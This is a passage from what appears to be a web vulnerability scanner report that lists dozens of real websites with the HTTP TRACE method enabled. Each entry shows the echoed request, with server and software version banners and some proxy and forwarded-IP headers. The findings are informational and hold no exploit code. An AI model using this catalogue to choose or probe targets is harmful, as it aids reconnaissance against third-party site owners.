Cookie: 90a2f96cc8ab7bdc


26.112. http://www.febreze.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.febreze.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.febreze.com
Cookie: 79652746fc5c2dd

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:54 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.febreze.com
Cookie: 79652746fc5c2dd


26.113. http://www.feedagg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedagg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.feedagg.com
Cookie: 35c4b5574d157bb7

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.feedagg.com
Cookie: 35c4b5574d157bb7


26.114. http://www.fibromyalgia-symptoms.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fibromyalgia-symptoms.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fibromyalgia-symptoms.org
Cookie: d048e4219dd5013c

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:53:37 GMT
Server: Apache/1.3.39 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: d048e4219dd5013c
Host: www.fibromyalgia-symptoms.org


26.115. http://www.filesupport.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filesupport.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.filesupport.org
Cookie: 5143d7ac2f4248c8

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.filesupport.org
Cookie: 5143d7ac2f4248c8


26.116. http://www.firstpeople.us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstpeople.us
Path:   /

Request

TRACE / HTTP/1.0
Host: www.firstpeople.us
Cookie: 8607bdd6176dd7bc

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:16:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.firstpeople.us
Cookie: 8607bdd6176dd7bc


26.117. http://www.foxytube.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxytube.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.foxytube.com
Cookie: 2ad0892037d6df37

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Connection: close
Content-Type: message/http
Set-Cookie: RNLBSERVERID=ded664; path=/
Cache-control: private

TRACE / HTTP/1.0
Host: www.foxytube.com
Cookie: 2ad0892037d6df37
X-RN-XFF: 173.193.214.243


26.118. http://www.free-clipart.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.free-clipart.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.free-clipart.net
Cookie: 6bb8784b7c9ad79d

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:15 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6bb8784b7c9ad79d
Host: www.free-clipart.net


26.119. http://www.freei.me/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freei.me
Path:   /

Request

TRACE / HTTP/1.0
Host: www.freei.me
Cookie: 72f040581e6bbd2c

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:38:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: message/http
X-Cache: MISS from sv38.byethost38.org
Via: 1.1 sv38.byethost38.org:80 (squid/2.7.STABLE9)
Connection: close

TRACE / HTTP/1.0
Host: www.freei.me
Cookie: 72f040581e6bbd2c
Via: 1.0 sv38.byethost38.org:80 (squid/2.7.STABLE9)
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200


26.120. http://www.freemooviesonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemooviesonline.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.freemooviesonline.com
Cookie: aac85f5806f6eb46

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.freemooviesonline.com
Cookie: aac85f5806f6eb46


26.121. http://www.gabdasi.info/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gabdasi.info
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gabdasi.info
Cookie: 14053efdd9970e20

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:34:57 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gabdasi.info
Cookie: 14053efdd9970e20


26.122. http://www.gallhere.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gallhere.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gallhere.com
Cookie: d551428931017e00

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:11 GMT
Server: Apache/2.2.17 (FreeBSD) mod_fcgid/2.3.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gallhere.com
Cookie: d551428931017e00


26.123. http://www.garden.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.garden.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.garden.org
Cookie: 1ff2c1c1a0936158

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:32:41 GMT
Server: Apache/1.3.32 (Unix) PHP/5.0.3 mod_ssl/2.8.21 OpenSSL/0.9.7d
Content-Type: message/http
Connection: close

TRACE // HTTP/1.1
Connection: Keep-Alive
Cookie: 1ff2c1c1a0936158
Host: www.garden.org
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.garden.org
X-Forwarded-Server: www.garden.org


26.124. http://www.gastongazette.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gastongazette.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gastongazette.com
Cookie: 814d2253af4ba768

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:20 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gastongazette.com
Cookie: 814d2253af4ba768


26.125. http://www.gearfuse.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gearfuse.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gearfuse.com
Cookie: ff4a2dcfd8d756f5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:35 GMT
Server: Apache/2.2.14 (Ubuntu)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gearfuse.com
Cookie: ff4a2dcfd8d756f5


26.126. http://www.getyoursmartphone.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getyoursmartphone.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.getyoursmartphone.com
Cookie: 226ad93b49899768

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 136
X-Cacheable: YES
Date: Mon, 02 May 2011 00:14:24 GMT
X-Varnish: 2236557843
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: mneme.sb03.com
X-Cache: MISS

TRACE / HTTP/1.0
Host: www.getyoursmartphone.com
Cookie: 226ad93b49899768
X-Varnish: 2236557843
X-Forwarded-For: 173.193.214.243


26.127. http://www.gianttube.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gianttube.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gianttube.com
Cookie: ea412ee5f19fec7a

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:46:11 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: ea412ee5f19fec7a
Host: www.gianttube.com


26.128. http://www.gmfullsize.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gmfullsize.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gmfullsize.com
Cookie: c409b16e9a177db4

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gmfullsize.com
Cookie: c409b16e9a177db4


26.129. http://www.gospelmusicchannel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gospelmusicchannel.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gospelmusicchannel.com
Cookie: 70568a3ba5977702

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:49 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gospelmusicchannel.com
Cookie: 70568a3ba5977702


26.130. http://www.gov-auctions.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gov-auctions.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gov-auctions.org
Cookie: 116f7b507dc27ea5

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gov-auctions.org
Cookie: 116f7b507dc27ea5


26.131. http://www.grannarium.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grannarium.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.grannarium.com
Cookie: 4d71ac86476c68af

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:51 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_ssl/2.8.31 OpenSSL/0.9.8c
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 4d71ac86476c68af
Host: www.grannarium.com


26.132. http://www.grannymassacre.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grannymassacre.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.grannymassacre.com
Cookie: 896c8b14a34d09b8

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:24 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.grannymassacre.com
Cookie: 896c8b14a34d09b8


26.133. http://www.green-paydayloan.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.green-paydayloan.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.green-paydayloan.com
Cookie: 46641c2785dcad2

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:22 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.green-paydayloan.com
Cookie: 46641c2785dcad2


26.134. http://www.greenanswers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenanswers.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.greenanswers.com
Cookie: 7bbe92ace030a187

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:47 GMT
Server: Apache/2.2.8 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.greenanswers.com
Cookie: 7bbe92ace030a187


26.135. http://www.greenhulk.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.greenhulk.net
Cookie: ea810321e99622de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:23 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.greenhulk.net
Cookie: ea810321e99622de


26.136. http://www.greensmoke.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greensmoke.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.greensmoke.com
Cookie: 10ffd4634fba0f97

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:13:59 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.greensmoke.com
Cookie: 10ffd4634fba0f97


26.137. http://www.guitarnoise.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarnoise.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.guitarnoise.com
Cookie: cecd14f9b7b47dc

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.guitarnoise.com
Cookie: cecd14f9b7b47dc


26.138. http://www.hairymaturecuties.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairymaturecuties.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hairymaturecuties.com
Cookie: fc362c586676b4d8

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:32 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: fc362c586676b4d8
Host: www.hairymaturecuties.com


26.139. http://www.halfpriceozarks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.halfpriceozarks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.halfpriceozarks.com
Cookie: b66b3cfbec75436d

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:07 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.halfpriceozarks.com
Cookie: b66b3cfbec75436d


26.140. http://www.harlandclarke.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harlandclarke.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.harlandclarke.com
Cookie: 2a5f1e1cc705758e

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.harlandclarke.com
Cookie: 2a5f1e1cc705758e


26.141. http://www.healthykids.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthykids.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.healthykids.org
Cookie: f1fea3240701fa8c

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:46 GMT
Server: Apache/2.2.2 (FreeBSD) mod_ssl/2.2.2 OpenSSL/0.9.8b
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.healthykids.org
Cookie: f1fea3240701fa8c


26.142. http://www.heartspring.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heartspring.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.heartspring.net
Cookie: 3a2f2b7c6065204c

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:28 GMT
Server: Apache/2.2.15 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/1.0.0d
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.heartspring.net
Cookie: 3a2f2b7c6065204c


26.143. http://www.hematologylibrary.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hematologylibrary.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hematologylibrary.org
Cookie: d7f5f6839b4ab3b9

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:58 GMT
Server: Apache/1.3.26 (Unix) DAV/1.0.3 ApacheJServ/1.1.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: d7f5f6839b4ab3b9
Host: www.hematologylibrary.org


26.144. http://www.highcharts.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.highcharts.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.highcharts.com
Cookie: 531d4a64c62b6e49

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:46 GMT
Server: Apache/2.2.16
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.highcharts.com
Cookie: 531d4a64c62b6e49


26.145. http://www.highspeedinternet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.highspeedinternet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.highspeedinternet.com
Cookie: 1cd9f6c2f2af6902

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.highspeedinternet.com
Cookie: 1cd9f6c2f2af6902


26.146. http://www.hittracker.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hittracker.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hittracker.org
Cookie: c9bb42458c0df759

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:30 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hittracker.org
Cookie: c9bb42458c0df759


26.147. http://www.hlsm.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hlsm.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hlsm.com
Cookie: f48937fea3dfd0a3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:10:48 GMT
Content-Type: message/http
Content-Length: 66

TRACE / HTTP/1.0
Host: www.hlsm.com
Cookie: f48937fea3dfd0a3


26.148. http://www.hotelgrandpacific.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelgrandpacific.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hotelgrandpacific.com
Cookie: a572f5405023ae66

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:01:46 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10 mod_ssl/2.8.31 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: a572f5405023ae66
Host: www.hotelgrandpacific.com


26.149. http://www.hotmomstube.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotmomstube.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hotmomstube.com
Cookie: c3dfc3cab6e7f80f

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:58 GMT
Server: Apache/1.3.42 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: c3dfc3cab6e7f80f
Host: www.hotmomstube.com


26.150. http://www.hotspotshield.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotspotshield.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hotspotshield.com
Cookie: 69aab8c851f472eb

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:49 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hotspotshield.com
Cookie: 69aab8c851f472eb


26.151. http://www.hyperhistory.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hyperhistory.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hyperhistory.net
Cookie: a9e5c8ef15e71128

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:40:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hyperhistory.net
Cookie: a9e5c8ef15e71128


26.152. http://www.hyperlaunch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hyperlaunch.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hyperlaunch.com
Cookie: 6aa8170db094a6f7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:10 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hyperlaunch.com
Cookie: 6aa8170db094a6f7


26.153. http://www.idealwifes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.idealwifes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.idealwifes.com
Cookie: a31c91e5e22efccd

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: a31c91e5e22efccd
Host: www.idealwifes.com


26.154. http://www.ihatebigbrother.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ihatebigbrother.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ihatebigbrother.com
Cookie: 2b7c59d97267c55d

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:45 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ihatebigbrother.com
Cookie: 2b7c59d97267c55d


26.155. http://www.ilmeteo.it/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ilmeteo.it
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ilmeteo.it
Cookie: da21301908d5796c

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:04:54 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ilmeteo.it
Cookie: da21301908d5796c
X-Forwarded-For: 173.193.214.243
X-Varnish: 1375215106


26.156. http://www.jobsahoy.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsahoy.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.jobsahoy.net
Cookie: 5fd8c0a7aeaf48a7

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:23:01 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.jobsahoy.net
Cookie: 5fd8c0a7aeaf48a7


26.157. http://www.jpfun.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpfun.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.jpfun.com
Cookie: 3c51382d6daec03d

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:16 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.jpfun.com
Cookie: 3c51382d6daec03d


26.158. http://www.kingpayday.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kingpayday.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kingpayday.net
Cookie: 18fae04e599ea564

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:13 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 18fae04e599ea564
Host: www.kingpayday.net


26.159. http://www.kit.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kit.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kit.net
Cookie: f748734d0ba31a52

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:40:17 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.kit.net
Cookie: f748734d0ba31a52


26.160. http://www.knowledgerush.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.knowledgerush.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.knowledgerush.com
Cookie: 6c1c967c2b8a5ebc

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:00:21 GMT
Server: Apache/2.2.15 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.knowledgerush.com
Cookie: 6c1c967c2b8a5ebc


26.161. http://www.kylotteryretailers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kylotteryretailers.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kylotteryretailers.com
Cookie: 4b2f7185cc70b4e7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:35 GMT
Server: IBM_HTTP_Server
Connection: close
Content-Type: message/http
Set-Cookie: Coyote-2-a010362=a010303:0;Domain=kylotteryretailers.com;Path=/

TRACE / HTTP/1.0
Host: www.kylotteryretailers.com
Cookie: 4b2f7185cc70b4e7


26.162. http://www.lacetoleather.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lacetoleather.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lacetoleather.com
Cookie: b54b3c7e13f9ac81

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:14 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b54b3c7e13f9ac81
Host: www.lacetoleather.com


26.163. http://www.ldoceonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ldoceonline.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ldoceonline.com
Cookie: 61328cb5445d172f

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:43:37 GMT
Server: Apache/1.3.34 (Debian) mod_perl/1.29
Content-Type: message/http
X-Cache: MISS from papa.cw.idm.fr
X-Cache-Lookup: NONE from papa.cw.idm.fr:801
Via: 1.0 papa.cw.idm.fr:801 (squid/2.6.STABLE5)
Connection: close

TRACE / HTTP/1.0
Cache-Control: max-age=86400
Cookie: 61328cb5445d172f
Host: www.ldoceonline.com
Via: 1.0 papa.cw.idm.fr:801 (squid/2.6.STABLE5)
X-Forwarded-For: 173.193.214.243, 10.0.246.1, 10.0.243.1


26.164. http://www.leo.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leo.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.leo.org
Cookie: d8dd5ae4bf21024a

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:50 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.leo.org
Cookie: d8dd5ae4bf21024a


26.165. http://www.lesbos-hd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lesbos-hd.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lesbos-hd.com
Cookie: 35c375628e32f662

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lesbos-hd.com
Cookie: 35c375628e32f662


26.166. http://www.links4vids.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.links4vids.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.links4vids.com
Cookie: e0aa7d715ea67dfa

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:53 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e0aa7d715ea67dfa
Host: www.links4vids.com


26.167. http://www.little-miss.eu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.little-miss.eu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.little-miss.eu
Cookie: 2c8ee908b68e546

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:37:17 GMT
Server: Apache/2.2.17 (Win32) PHP/5.3.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.little-miss.eu
Cookie: 2c8ee908b68e546


26.168. http://www.livedash.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedash.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.livedash.com
Cookie: 688c7a8fb1da3a0a

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:47 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
